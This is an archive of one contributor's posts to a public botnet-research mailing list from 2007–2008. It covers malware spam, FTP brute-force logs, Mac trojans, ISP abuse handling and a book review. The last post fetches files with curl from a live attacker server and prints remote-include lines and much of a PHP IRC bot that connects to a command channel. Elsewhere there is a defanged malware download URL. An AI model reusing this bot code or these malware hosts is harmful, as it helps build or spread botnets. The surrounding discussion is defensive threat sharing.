Re: [botnets] Another bogus "greeting card" spamming a malware URL

2008-08-28 Thread James Pleger
There are quite a few of these, it is a pretty big campaign.

I'm pretty sure these active sites were compromised, however I haven't
done analysis on the binaries yet.

Live drops:

James Pleger
e: [EMAIL PROTECTED]



On Wed, Aug 27, 2008 at 6:02 PM, Gadi Evron <[EMAIL PROTECTED]> wrote:
> Another bogus "greeting card" spamming a malware URL (again, one I've seen
> for a few days now and still live):
>
> h ttp://u gm-records.de/e-card.exe
>
> Detection wise...Someone already sent it to VT:
>
> http://www.virustotal.com/analisis/50bf6f61971f349a5de651aa5515607f
>
> As usual, several days later detection is minimal.
>
>Gadi.
> ___
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
>


Re: [botnets] reviving this list, allowing sharing

2008-08-27 Thread James Pleger
I think that is a bit too high volume for this list, maybe throwing
honeypot logs to an aggregator and then sending a daily digest would
be more appropriate.

James Pleger
e: [EMAIL PROTECTED]



On Wed, Aug 27, 2008 at 6:10 PM, Jeremy <[EMAIL PROTECTED]> wrote:
> I propose that each and every one of us on this list configure our
> nepenthes boxes with the email address of this distribution list, so
> we can share information about new botnet clients in real time.
>
> Thoughts?
>
> -Jeremy
>
> On Wed, Aug 27, 2008 at 4:41 PM, Gadi Evron <[EMAIL PROTECTED]> wrote:
>> Hi. When this list was started a while back a lot of sharing and discussion
>> was happening.
>>
>> This made us take a step back at the time. Today, when most of this
>> information can do far more good than harm, it is my strong belief open
>> information sharing on botnets, malicious web sites and similar subjects will
>> be useful.
>>
>> Feel free to share data, and let's see how it goes. We, on our end will work
>> to mitigate the risks you send in.
>>
>> Who is first?
>>
>>Gadi.
>>
>
>
>
> --
>


Re: [botnets] Spam botnet discovered

2007-11-05 Thread James Pleger
Yea, he is...

I think the main reason for that is that this list is public and is archived
by mailing list archives. When google picks up those sites, they index the
data and that is generally not a good thing.

I hope you don't get a bad impression, as the last few emails I have seen
from you have been useful and are nice to see for a change.

Thanks,
James

On Nov 5, 2007 9:21 AM, Interspace System Department <[EMAIL PROTECTED]> wrote:

> Is it your list? You are moderator?
>
>
>
> Gadi Evron writes:
> > On Mon, 5 Nov 2007, Interspace System Department wrote:
> >> The strange thing, that only you complaining about such behaviour ;)
> >
> > I am not complaining, I am dictating.
> >
> > Thanks again.
> >
> >
> >> Anyway, these links are safe, as these bots spread only through FTP
> >> (yes, stolen ftp accounts).
> >>
> >> Have fun,
> >> Dan
> >>
> >> Gadi Evron writes:
> >>> On Mon, 5 Nov 2007, Interspace System Department wrote:
> >>>> Hi Gadi,
> >>>> I don't have time for all that "obfu/deobfu" games, take it as-is ;)
> >>>
> >>> I quite understand, but as much as I regret having to say it, take
> >>> your very valuable information somewhere else. :)
> >>>
> >>> Let me explain my position:
> >>> These links get indexed, and at that point more web servers become
> >>> compromised. I'd go as far as saying people can now seed your log so
> >>> that you infect them when you report it and people follow links.
> >>>
> >>> Ethics and secure sharing are a bitch, but we have to live with them.
> >>>
> >>> I hope you understand.
> >>>
> >>>
> >>>>
> >>>> Thanks,
> >>>> Dan
> >>>>
> >>>> Gadi Evron writes:
> > On Mon, 5 Nov 2007, Interspace System Department wrote:
> >> Hi again!
> >>
> >> Hope you doing well ;)
> >
> > Thanks again for posting. :)
> >
> > When obfuscating links, www should be made into w ww.
> >
>


Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread James Pleger
You are beating a dead horse here.

The point of this whole thing was to say that "HEY, they are targeting a new
platform other than windows". Not that it requires user interaction to
install it. Honestly, think about it... this is how a bunch of the early
malware was installed on the windows platform. By USER interaction...
wanting to go to a porn site and needing xyz dialer to look at the pretty
pictures.

The other point is that mac users have a false sense of security...
Honestly, how many mac users run AV? I know I don't on my iBook...

The point about windows being less secure than osx is true (I agree with it),
but in another sense it doesn't matter. If someone isn't patching they are
both insecure. I am not a windows fanboy by any means, but the argument of
OSX is more secure than Windows in my mind isn't a good point. I honestly
don't care what is more secure out of the box... It is my job to keep things
secure no matter what os or version is on them. If there is a remote exploit
that can get me root on an unpatched osx (like there have been many security
updates that fix), and I can get the same type of privs on an unpatched
windows box then they are both "Insecure". Default setups honestly on
windows have gotten much better than in prior years. However we aren't here
to talk about windows versus linux versus mac.




On Nov 4, 2007 2:15 PM, Kyle Lutze <[EMAIL PROTECTED]> wrote:

> PinkFreud wrote:
> > Gadi already made the point that the significance of this lies in
> > professional malware authors taking notice of Apple.  If this trojan
> > was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction
> > would be the same - 'wow, the malware authors are taking notice of a
> > new platform!'.  That *is* significant, and those who are chalking that
> > reaction up to 'anti-Apple zealotry' are sorely mistaken.
> >
> fair enough, both your points there are quite valid and I wasn't
> denying the significance of malware authors taking notice to apple,
> just that this being considered in the wild is a bit overboard.
>
> > There is a second point being made here, too - Apple isn't exactly
> > known for writing bug-free code (I've already given some examples
> > earlier in this thread), and they're not exactly known for fixing bugs
> > until they're absolutely forced to.  This is liable to create problems
> > down the road - given that the malware authors are now starting to take
> > notice of Macs, they'll undoubtedly try a few exploits before long.  I
> > just hope Apple has patched all known holes by then... :)
> >
>
> My point is, where's the bug in apple's code here? There's nothing
> apple can do about human stupidity in ignoring all of the message
> boxes before this trojan can be installed.
>
>



-- 
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]


Re: [botnets] the heart of the problem [was: RE: mac trojan in-the-wild]

2007-11-01 Thread James Pleger
To be quite honest, I think there is also the fact that the majority
of Apple users don't run AV or any type of protection suite because
"Viruses are for Windows". I am not sure if that was discussed at all
in this topic. I know that there are flaws with AV, but it provides a
layer of protection... I don't think that this is a huge deal, other
than the fact they are expanding their Horizon.

This malware isn't a real surprise to me, I think that we will start
seeing more malware targeting the linux desktop, with the rise in
popularity of linux on desktops, as well as very cheap linux PC's. I
imagine we will have a similar flood of threads, and media hype about
that as well.

Just my two cents... and this may not have made any sense, as I am
very tired right now...

--James Pleger

On 11/1/07, Gadi Evron <[EMAIL PROTECTED]> wrote:
> On Thu, 1 Nov 2007, Thor (Hammer of God) wrote:
> > But more importantly, let's look at things from the other side.  Let's
> > say I'm wrong, and that Gadi is right on target with his "hit hard"
>
> I'd say we are both right.
> You look at it from a security researcher stand-point. There is nothing
> interesting about user-interaction, and it is even kind of lame.
>
> From a reasonable perspective, we refuse to believe people will act so ..
> silly.
>
> > prediction and that we should be very concerned with this.  Given the
>
> Not predicting, assessing.
>
> Criminal elements have a very clear cost/benefit calculation. For example,
> they won't release a 0day such as WMF or ANI as long as their revenue
> goals are met with published ones. They collect statistics on OS, browser,
> language, which exploit got how many, etc.
>
> They have thousands on thousands of sites infecting users who surf (some
> of them ad-based on real sites, or defaced sites such as forums that
> remain with the same content only now infect people). Then there is also
> spam directing people to these sites.
>
> Now, a criminal gang (could be the mob could be one guy) targets the mac.
> So much so that they serve different malware by OS-type.
>
> As a security researcher looking at code, bits and bytes, you are simply
> not usually following what's going on in operational security where things
> are bleak.
>
> From an operational security standpoint, this equates to what happened in
> the world of the Internet back when Windows 98 was around. Not what
> security features it had.
>
> > requirements here, that again being flagrant ignorance where all the
> > above steps are executed (including the explicit admin part)-- what
> > exactly are we supposed to do?  If people are willing and able to go
> > through the motions above what can we as security people do to prevent
> > it?  Far too many people in this industry are far too quick to point out
> > how desperate the situation is at all turns, but I don't see many people
> > offering real solutions.  But you know, I have to say...  If we are
>
> Things are in fact FUBAR. We need new ideas and new solutions as honestly,
> although we want to feel we make a difference by taking care of this or
> that malware or this and that C&C we are powerless and have not made a
> real difference in the past 6 years while things got worse.
>
> We need new solutions and new ideas, and would be more than happy to have
> new people exploring operational security.
>
> The current state of Internet security is you get slapped -- BAM! -- and
> you write an analysis about it. (when speaking at ISOI I actually slapped
> myself -- HARD -- when I said it on stage, not a good idea for future
> reference).
>
> > really going to consider this "serious," and we are really going to
> > define part of our jobs as being responsible for stopping people who
> > have absolutely no concerns for what they do and are willing to enter
> > their admin credentials into any box that asks for it, then I'd say that
> > there is a *serious* misunderstanding about what security is, and what
> > can be done about it-- either that, or I'm just in the wrong business.
> >
> > t
>
> Well, we can't choose the risks. They choose us. Sometimes they are cool,
> sometimes they're not.
>
> I often start emails by saying "first off, this is not the end of the
> world, the Sun will rise tomorrow and the Internet won't die today". I
> tire of it. Of course the Internet won't die today, but it is Mac season.
>
> Apple is very much correct by not invest

Re: [botnets] FTP attack seen on echnaton.serveftp.com

2007-10-06 Thread James Pleger
I agree that this could be distributed... However what you may be
seeing is the same group of script kiddies that are targeting your
block of hosts.

I have seen that a good majority of the bruteforcers use the same
exact dictionaries (much like the ssh bruteforcers), and use the exact
same toolkits.

I have caught like maybe 30-40 of these types of kits and they are all
basically the same. Same things that I see with sql SA bruteforcing
and SSH bruteforcing... Same kits used, which indicates that only a
few groups are doing it.

Just my 2 cents.

On 10/6/07, Mr. X <[EMAIL PROTECTED]> wrote:
> On 10/6/07, James Pleger <[EMAIL PROTECTED]> wrote:
> > This looks like standard ftp bruteforcing...
> >
> > Typical targets of these attacks are MS FTP Servers, they will target
> > the administrator account, so they can get that account password, and
> > then upload files and execute them, or otherwise compromise the box.
> >
> > I have seen this activity for many years, and more likely than not
> > isn't a targeted attack.
> >
> > On 10/6/07, Peter Dambier <[EMAIL PROTECTED]> wrote:
> > > Good morning,
> > >
> > > I have put the logs from my mailer and ftp-server
> > > together with my router and VoIP:
> > >
> > > Oct  5 12:09:34 voipd[406]: query_local_ipaddress: 62.227.220.143
> > >
> > > netdate("Oct-5","23:38:06","time3 +0.234 Fri Oct  5 
> > > 23:38:03.000").
> > > xinetd_open("Oct-6","00:31:58","ftp","203.112.196.130").
> > > ftp_connect("Oct-6","00:32:02","203.112.196.130").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for 
> > > user [Administrator]","Oct-6","00:32:03").
> > > ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication 
> > > failures","Oct-6","00:33:00").
> > > xinetd_close("Oct-6","00:33:00","ftp").
> > > xinetd_open("Oct-6","00:33:00","ftp","203.112.196.130").
> > > ftp_connect("Oct-6","00:33:01","203.112.196.130").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for 
> > > user [Administrator]","Oct-6","00:33:02").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for 
> > > user [Administrator]","Oct-6","00:33:06").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for 
> > > user [Administrator]","Oct-6","00:33:13").
> > > ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication 
> > > failures","Oct-6","00:33:53").
> > > xinetd_close("Oct-6","00:33:53","ftp").
> > > xinetd_open("Oct-6","00:33:54","ftp","203.112.196.130").
> > > ...
> > > xinetd_close("Oct-6","03:06:22","ftp").
> > > xinetd_open("Oct-6","03:06:23","ftp","203.112.196.130").
> > > ftp_connect("Oct-6","03:06:33","203.112.196.130").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for 
> > > user [Administrator]","Oct-6","03:06:34").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for 
> > > user [Administrator]","Oct-6","03:07:20").
> > > ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication 
> > > failures","Oct-6","03:07:36").
> > > xinetd_close("Oct-6","03:07:36","ftp").
> > >
> > >
> > > Oct  6 03:08:22 dsld[381]: EVENT(80): Die Internetverbindung wird kurz 
> > > unterbrochen, um der Zwangstrennung durch den Anbieter zuvorzukommen.
> > > Oct  6 03:08:23 dsld[381]: Channel 0 closed (physical)
> > > Oct  6 03:08:23 dsld[381]: internet: disconnected
> > > Oct  6 03:08:23 dsld[381]: EVENT(23): Internetverbindung wurde getrennt.
> > > Oct  6 03:08:24 multid[360]: ONLINE: now offline
> > > Oct  6 03:08

Re: [botnets] FTP attack seen on echnaton.serveftp.com

2007-10-06 Thread James Pleger
ot;ftp","203.112.196.130").
> ftp_connect("Oct-6","04:47:22","203.112.196.130").
> ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for user 
> [Administrator]","Oct-6","04:47:22").
> ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for user 
> [Administrator]","Oct-6","04:48:10").
> ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication 
> failures","Oct-6","04:48:28").
> xinetd_close("Oct-6","04:48:28","ftp").
> xinetd_open("Oct-6","04:48:31","ftp","203.112.196.130").
> ...
> xinetd_close("Oct-6","04:56:37","ftp").
> xinetd_open("Oct-6","04:56:41","ftp","203.112.196.130").
> ftp_connect("Oct-6","04:56:45","203.112.196.130").
> ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for user 
> [Administrator]","Oct-6","04:56:46").
> ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication 
> failures","Oct-6","04:57:40").
> xinetd_close("Oct-6","04:57:40","ftp").
> netdate("Oct-6","05:38:05","time3 +0.251 Sat Oct  6 
> 05:38:02.000").
>
>
> Interestingly enough the attack survived a DSL disconnect
> and reconnect with changed IPv4 address.
>
> The hole of 90 minutes suggests they did not follow me via DNS or SIP.
>
> They only tried user [Administrator].
>
> nmap says they have no ports open. I did not try the complicated things :)
>
>
> Nothing suspicious in the exim (mailer) log.
> No other addresses seen.
>
> Kind regards
> Peter and Karin
>
> --
> Peter and Karin Dambier
> Cesidian Root - Radice Cesidiana
> Rimbacher Strasse 16
> D-69509 Moerlenbach-Bonsweiher
> +49(6209)795-816 (Telekom)
> +49(6252)750-308 (VoIP: sipgate.de)
> mail: [EMAIL PROTECTED]
> mail: [EMAIL PROTECTED]
> http://iason.site.voila.fr/
> https://sourceforge.net/projects/iason/
> http://www.cesidianroot.com/
>
>


-- 
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]


Re: [botnets] Why ISP's and NSP's Love Botnets

2007-09-21 Thread James Pleger
Wow, you have my favorite ASNs there :)

I really REALLY hope that there is a time in the near future when I can
submit a complaint to an ISP and have some sort of peace of mind that it
might be acted upon. I am kind of curious if the pressure is because their
networks are being adversely affected by these infections, or if it is
threats from upstream providers...

/me sighs...

On 9/21/07, Paul Ferguson <[EMAIL PROTECTED]> wrote:
>
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> - -- "James Pleger" <[EMAIL PROTECTED]> wrote:
>
> >I don't think that ISPs are going to care until there is a business model
> >that will make them money(or save it) and not cost them a bunch of
> >money/staff overhead.
> >
> >It costs a great deal to staff an abuse department that knows what they
> >are doing, there isn't really any value for the ISP to take down a botted
> >machine that is sending spam, unless it is affecting their core
> >business.
> >
> >
>
> Perhaps, but the pressure is mounting.
>
> Until that time, we have this:
>
> https://nssg.trendmicro.com/nrs/reports/rank.php?page=1
>
> - - ferg
>
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawg(at)netzero.net
> ferg's tech blog: http://fergdawg.blogspot.com/
>
>
>
>


-- 
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]


Re: [botnets] Why ISP's and NSP's Love Botnets

2007-09-21 Thread James Pleger
I don't think that ISPs are going to care until there is a business model
that will make them money(or save it) and not cost them a bunch of
money/staff overhead.

It costs a great deal to staff an abuse department that knows what they are
doing, there isn't really any value for the ISP to take down a botted
machine that is sending spam, unless it is affecting their core business.

Just my two cents...

Look at TTNET, they don't do anything about complaints(from what I can
tell).

On 9/21/07, PinkFreud <[EMAIL PROTECTED]> wrote:
>
> On Fri, Sep 21, 2007 at 10:02:32PM +, John Fraizer babbled thus:
>
> *snip*
>
> > Again, there is no silver bullet.  It is *NOT* the responsibility of the
> > providers to force safe computing down the throat of their customers.
>
> I disagree with this.  By your reasoning, it's not the responsibility
> of the university I work for to make sure students don't put infected
> machines on the network (we actually take a very proactive approach to
> minimize the number of 'problem' machines we have on the network).
>
> To go back to your earlier analogy of a user enticing Joe Botherder,
> you're right - there's little an ISP can do in that case.  But when
> you're talking about machines actively sending out spam/involved in a
> DDoS/etc., then yes, it *is* the ISP's responsibility to do something.
>
> I'm not saying an ISP should be watching everything that goes on on
> its network at all times.  However, when an abuse department is
> contacted about a problem machine on the ISP's network, it is most
> definitely the ISP's responsibility to investigate, attempt to contact
> the owner, and as a last resort, pull it off the network.
>
> If an ISP weren't to take responsibility for the machines, who would?
> The user?  As you pointed out, that's rather unlikely.  :)
>
> The real question is - what do we do with ISPs which ignore abuse
> reports, like Turk Telekom, RDSNet, or QualityNet?
>
>
> *snip*
>
> > ~john
>
> --
> PinkFreud
> Chief of Security, Nightstar IRC network
> irc.nightstar.net | www.nightstar.net
> Server Administrator - Blargh.CA.US.Nightstar.Net
> Unsolicited advertisements sent to this address are NOT welcome.
>
>
>
>


Re: [botnets] botnet signature?

2007-09-18 Thread James Pleger
I can't speak for other researchers, but some of the message IDs that I have
seen don't necessarily copy this format... However, this is just stuff that
I have seen come to me. I don't have a huge spamtrap.

Message-ID: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>

On 9/18/07, Matt Jonkman <[EMAIL PROTECTED]> wrote:
>
> Can anyone verify they're seeing the same in other traps?
>
> Can anyone comment on any naturally occurring source or seed that'd
> cause this repeating?
>
> If it's seen in more than one place I'll get together some snort sigs
> for it.
>
> Matt
>
> PinkFreud wrote:
> >
> >
> > 
> >
> > Actually, the pattern appears to be 01c7fa35$
> >
> >
> > On Tue, Sep 18, 2007 at 05:03:17PM -0400, Jonathan Yarden babbled thus:
> >> I have a spamtrap getting 80-100k messages/day and noted a pattern that
> >> repeats in the Message-ID field:
> >>
> >> Message-ID: <[EMAIL PROTECTED]>
> >>
> >> Obviously in this subset, you can clearly see the pattern...01c7fa
> >>
> >> My question to the list is whether this pattern appears in some of the
> >> Storm Botnet email others are getting.
> >> --
> >> Jon
> >>
> >> Those who make peaceful revolution impossible will make violent
> >> revolution inevitable.
> >> -- John F. Kennedy
> >
> >
> > 
> >
>
> --
> 
> Matthew Jonkman
> Bleeding Edge Threats
> US Phone 765-429-0398
> US Fax 312-264-0205
> AUS Phone 61-42-4157-491
> AUS Fax 61-29-4750-026
> http://www.bleedingthreats.net
> 
>
> PGP: http://www.bleedingthreats.com/mattjonkman.asc
>
>
>



-- 
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]


Re: [botnets] Alternative Botnet C&Cs - free chapter from Botnets:The Killer Web App

2007-07-25 Thread James Pleger
On 7/25/07, Craig Holmes <[EMAIL PROTECTED]> wrote:


> As promised, I bought the book and finally received it (thanks for the slow
> turn around Amazon).
>
> I have begun reading it, and although I am only starting the third chapter I
> am wholly unimpressed.
>
> Before I discuss the text of the book, I am curious to know. Is it a print
> problem or do many of the graphics in the book look overly blurry or
> excessively jagged? Some of the pictures look like they were compressed to a
> monochrome bitmap of about 2k in size (see page 47).
>
> My experience with botnets seem to differ in many ways from the text in the
> book:
>
> The book begins by describing what SDBot, Agobot, GTBot, etc do. They include
> lists of ports and vulnerabilities that the given bot exploits, actions it
> may perform etc. The book doesn't make the point strong enough that a lot of
> code (especially SDBot code) started off as simply a public offering and
> evolved through many different trees by people with no organization. These
> trees criss-crossed without any knowledge of many of the contributors. In
> fact, as I recall SDBot (at least a couple of versions from sd) was released
> to the public without a single attack vector. It is my belief that this
> version is responsible for the most variants due to its availability.
>
> The book seems to be making a point that bots are being used by organized
> crime. I think this point has been pushed on many fronts of this issue by many
> people, however I remain doubtful. In my experience with farmers (or bot
> herders as the book calls them) is that they're packet kiddies out to DoS
> their moronic buddies or enemies. The botnet was just a natural evaluation
> from Trinoo/TFN/Trinity/Kaiten or if they're even lamer than Backorifice,
> etc. Though I do certainly accept that some lone individuals use botnets for
> monetary gain (avert scams), I wouldn't classify it as organized. Look at the
> numbers given in the book:
> -4.5 Million active botnet computers
> -A small botnet is 10,000 computers
> That means that there are about 500 botnets active. The book states only a
> handful of cases that involved organized crime, possibly 5 cases. That means
> that they've identified at least 0.01% of the 500 botnets are being run by
> the big evil organized crime people. Not to say that proves them wrong, but
> it isn't enough evidence for me. I believe they are sensationalizing this
> fact quite a bit.
>
> The book paints a pretty diagram showing how people with their cam corders run
> from the movie theatre directly to their dorm and upload their bootlegs to
> topsites which are actually botnets. This is a silly notion. A great deal
> movies that are available on the internet today (and much software) are
> released by organized (though not by for profit) piracy groups (the 'scene').
> These groups do use topsites, but they are FTP servers running on legitimate
> hardware (a member of the group may be a sysadmin at MIT for example). These
> topsites and groups are not even remotely affiliated with botnets (or at
> least weren't in 2002 which is when my experience dates to). The offenders
> identified (from Drink or Die, Razor1911, etc) wouldn't be caught dead
> touching a botnet, as it would do great damage to their reputation.
> Furthermore, these elite groups have very little use for clickthrough scams,
> distributed storage, or dos attacks.



A bunch of these FTP servers being used are actually compromised servers.

There is one German release group that I have found that does this a lot; I
don't remember their name, but they will compromise a server with a weak
MSSQL SA account and then install an FTP daemon and serve their files. They
target the SQL servers, I believe, because they are typically decent servers
with decent upload and space.

That is just my 2 cents and what I have seen.

I feel like the authors are making a far too liberal attempt at connecting
the dots on many issues. I am also slightly disappointed as it seemed much of
the book will be focused on general intrusion detection techniques,
sandboxing, reporting etc. and less on practical cases, motivation, C&C
methods, encryption and more technical aspects of the bot itself.

I will report my final thoughts when I complete the book.

Craig


On Sunday 08 July 2007 21:53, Thomas Raef wrote:
> Gadi,
>
> It's easier for people to just buy the book. I bought it about a month
> ago and have read it a few time already. Nice work!

--
James Pleger
p: 623.298.7966
e: [

Re: [botnets] [Dshield] ISP redirecting IRC traffic to attempt bot removal (fwd)

2007-07-20 Thread James Pleger
What I find curious about this is the supposed fact about them using dns
redirection to do this. I think that might be misinformation, but the other
stuff would be kind of difficult to differentiate between real IRC traffic
and botnet traffic depending on how commands are issued/syntax.

It is 6:00am here and I am really tired, so that may not have made sense.

On 7/20/07, Gadi Evron <[EMAIL PROTECTED]> wrote:




-- Forwarded message --
Date: Fri, 20 Jul 2007 06:11:25 -0400
From: jayjwa <[EMAIL PROTECTED]>
Reply-To: General DShield Discussion List <[EMAIL PROTECTED]>
To: Dshield Mail List <[EMAIL PROTECTED]>
Subject: [Dshield] ISP redirecting IRC traffic to attempt bot removal


When blocking goes too far, part #2 (working title: First they came for
email, now it's IRC)



Background info:
1)
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/55016

2) The typical command for rbot/urxbot removal of the bot from the bot
user's perspective is to issue a command such as /msg bot .remove; sometimes
"!" is the command prefix, but technically it can be anything. They seem to
have forgotten that most bots require .login before accepting commands, but
there may be some that do not.

3) The code for the server appears altered as well, as it announces
multiple, different topics. Normally IRC servers do not do this for the same
channel.



Fri Jul 20 05:57:00 EDT 2007:


*** Performing DNS lookup for [70.168.70.4] (server 4)
*** DNS lookup for server 4 [70.168.70.4] returned (1) addresses
*** Connecting to server refnum 4 (70.168.70.4), using address 1 (
70.168.70.
+4:6667)
*** Looking up your hostname...
*** Checking Ident
*** No Ident response

(They lie, I do most certainly run Identd)

*** Welcome to the Internet Relay Network jayjwa
*** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2
*** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2
*** This server was created Thu Dec 6 2001 at 11:52:49 EST
*** localhost.localdomain 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve
*** There are 2 users and 0 invisible on 1 servers
*** I have 2 clients and 0 servers
*** Current local  users: 2  Max: 2
*** Current global users: 2  Max: 2
*** Highest connection count: 2 (2 clients) (2 since server was
(re)started)
*** - localhost.localdomain Message of the Day -
*** - Where's the kaboom? There was supposed to be an earth shattering
kaboom.
+
*** End of /MOTD command.
*** jayjwa ([EMAIL PROTECTED]) has joined channel #martian_
*** Mode change "+nt" on channel #martian_ by localhost.localdomain
*** Users on #martian_: @Marvin_ jayjwa
*** Topic for #martian_: .bot.remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: .remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: .uninstall
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: !bot.remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: !remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: !uninstall
*** The topic was set by Marvin_ 3 sec ago
 .bot.remove
 .remove
 .uninstall
 !bot.remove
 !remove
 !uninstall
*** Mode for channel #martian_ is "+tn"
*** Channel #martian_ was created at Fri Jul 20 05:46:57 2007
User [EMAIL PROTECTED] was not on the names list for
channel
+[#martian_] on server [4] -- adding them

   05:51AM [1] jayjwa #martian_ (+nt) (Mail: 56)  EPIC5 -- Type /help for
help
EPic>


To sum this up for those not familiar with IRC, if I was a client of this
ISP, and I tried to access the public IRC network irc.ablenet.org, my ISP's
nameserver would return knowingly false information to send me to this fake
server, which, once there, auto-logs me into a channel and attempts to
interact with software I may or may not have running on my machine in an
attempt to remove it from my machine.



--
[RBL:Just A Bad Idea] Do not use DNS-RBL; Demand your ISP stop.
   Tell RoadRunner/Adelphia, Netzero,etc: don't trash your mail.
http://www.ifn.net/classic/rblstory.htm
http://theory.whirlycott.com/~phil/antispam/rbl-bad/rbl-bad.html





--
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]

Re: [botnets] Legalise or Precedent Around Bot Monitoring

2007-06-27 Thread James Pleger
This is something that I have also been interested in. I would think that
controlling bots would be illegal, and would depend on what host was
connected to the network.

On 6/27/07, Danny McPherson <[EMAIL PROTECTED]> wrote:


Does anyone have pointers to either established precedent,
laws, or anecdotal information that one should consider before
monitoring botnet C&C activity - primarily from an Application
Layer perspective, as opposed to Network and Transport
Layer activity?

Same applies to actually instructing bots as well, for example
to disengage attacking hosts, etc.

I'm interested in information from any region..

Thanks in advance!

-danny







--
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]


Re: [botnets] Another botnet on eu.undernet.org

2007-03-21 Thread James Pleger



I actually found another one while searching:
http://217.172.161.74/solo/kgb.c

$server = "eu.undernet.org";
$chan = "#romulus katana";
$port = '6667';


[11:26:27 bash] [~]
[EMAIL PROTECTED] curl http://217.172.161.74/solo/kgb.c? | grep
include
  % Total    % Received % Xferd  Average Speed   Time    Time Time 
Current
 Dload  Upload   Total   Spent    Left 
Speed
100 22214  100 22214    0 0  23309  0 --:--:-- --:--:--
--:--:-- 39948
include 'http://217.172.161.74/solo/solo';
include 'http://217.172.161.74/solo/xeqt';
[11:26:33 bash] [~]
[EMAIL PROTECTED] curl http://217.172.161.74/solo/xeqt | more
  % Total    % Received % Xferd  Average Speed   Time    Time Time 
Current
 Dload  Upload   Total   Spent    Left 
Speed
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe = @ini_get('safe_mode');
$up = time();
$mn1 = php_uname();
$mn2 = PHP_OS;
function randomkeys($length)
{
  $pattern = "abcdefghijklmnopqrstuvwxyz";
  for($i=0;$i<$length;$i++)
  {
    $key .= $pattern{rand(0,35)};
  }
  return $key;
}

// BYY xeQter
$ip = $_SERVER['REMOTE_ADDR'];
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$xeQted = "[x] $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro1="sh$: Yes"; else $pro1="sh$: NO";
if (@file_exists("/usr/bin/wget")) $pro2="WGET: yes"; else $pro2="WGET:
NO";
if (@file_exists("/usr/bin/curl")) $pro3="CURL: yes"; else $pro3="CURL:
NO";
if (@file_exists("/usr/bin/lynx")) $pro4="LYNX: yes" ; else $pro4="LYNX:
NO";
if (@file_exists("/usr/bin/GET")) $pro5="GET: yes"; else $pro5="GET:
No";
if ($safe) $xsafe="Safe_mode: ON"; if (!$safe) $xsafe="safe_mode: OFF";
else $xsafe="Safe_mode: Unknown";
[EMAIL PROTECTED](); [EMAIL PROTECTED](); [EMAIL PROTECTED]();
$phpver = "PHP ".phpversion();

$vhost = "e8ea21c62fc9b75647054059b815d350";
$vhost2 = "7886906c819599697c97aa15d8e37f62";
$vhost3 = 'andone.users.undernet.org';
$identd = randomkeys(4).rand(100,999);
$me = randomkeys(5).rand(100,999);
$ircname = randomkeys(4).rand(100,999);
$version = "ShadowBot v2.4";
$server = "eu.undernet.org";
$quitmsg = "Let it rain";
$chan = "#romulus katana";
$port = '6667';
while(0==0)
{
$ircsock = @fsockopen($server, $port);
if (!$ircsock)
{
    echo "SHadow, Exit.\n";
}
if ($ircsock)
{
    fputs($ircsock,"USER $identd $me $server :$ircname\r\nNICK
$me\r\n");
    $on = time();
    while (!feof($ircsock)) {
    $rawbuffer = fgets($ircsock, 2048);
    $buffer = explode(" ", $rawbuffer);
    if( $buffer[0] == 'PING') {
  fputs($ircsock,"PONG $buffer[1] \r\n");
    }
    if( $buffer[1] == '001') {
  fputs($ircsock,"JOIN $chan\r\n");
  fputs($ircsock,"WHO $me\r\n");
    }
    if( $buffer[7]." ".$buffer[8]." ".$buffer[9]." ".$buffer[10] ==
'many connections from your' ) {
    exit;
    }
    if( $buffer[1] == '433') {
  if (!isset($me2)) {
    randomkeys(3).rand(100,999);
    fputs($ircsock,"NICK $me\r\n");
  }
  if (isset($me2)) {
    $me = $me2;
    unset($me2);
100 19559  100 19559    0 0  24087  0 --:--:-- --:--:--
--:--:-- 51413
[11:26:57 bash] [~]
[EMAIL PROTECTED]




James Pleger
Go Daddy Software, Inc.
[EMAIL PROTECTED]
Desk: 480-505-8800 x4093
Cell: 480-262-7293



David Vorel wrote:


Hi all,

nice shot Bodik ;] I found a different botnet on eu.undernet.org chan #vx8; it's a Linux
